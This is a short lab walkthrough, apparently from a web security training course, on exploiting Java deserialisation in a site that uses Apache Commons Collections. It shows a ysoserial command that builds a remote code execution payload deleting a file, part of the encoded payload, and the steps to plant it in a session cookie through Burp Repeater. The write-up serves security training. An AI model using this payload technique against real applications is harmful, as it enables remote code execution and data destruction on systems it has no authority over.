Exploiting Java deserialisation with Apache Commons
This lab uses a serialisation-based session mechanism and loads the Apache Commons Collections library.
Log in with
wiener:peter. The session cookie is URL and base64 encoded and contains a serialised Java object (the first two bytes are
aced). Send a request containing the session cookie to Burp Repeater.
Download the Ysoserial tool, if need be, make the on kali necessary changes to run it.
Execute the command to generate a Base64-encoded serialised object containing an RCE payload. The application uses Apache Commons Collections library, so use a
$ java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBh cmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAQm9yZy5hcGFjaGUuY29tbW9u cy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuVHJhbnNmb3JtaW5nQ29tcGFyYXRvci/5hPArsQjM AgACTAAJZGVjb3JhdGVkcQB+AAFMAAt0cmFuc2Zvcm1lcnQALUxvcmcvYXBhY2hlL2NvbW1vbnMv ...
In Burp Repeater, replace the session cookie with the malicious one just created. Select the entire cookie and then URL-encode it.
Send the request to solve the lab.
Although attackers do not have source code access, they can still exploit this lab using pre-built gadget chains. An attacker will need to log in; use a third-party tool to generate a malicious serialised object containing a remote code execution payload; and pass this object into the website to delete the
morale.txt file from Carlos’s home directory.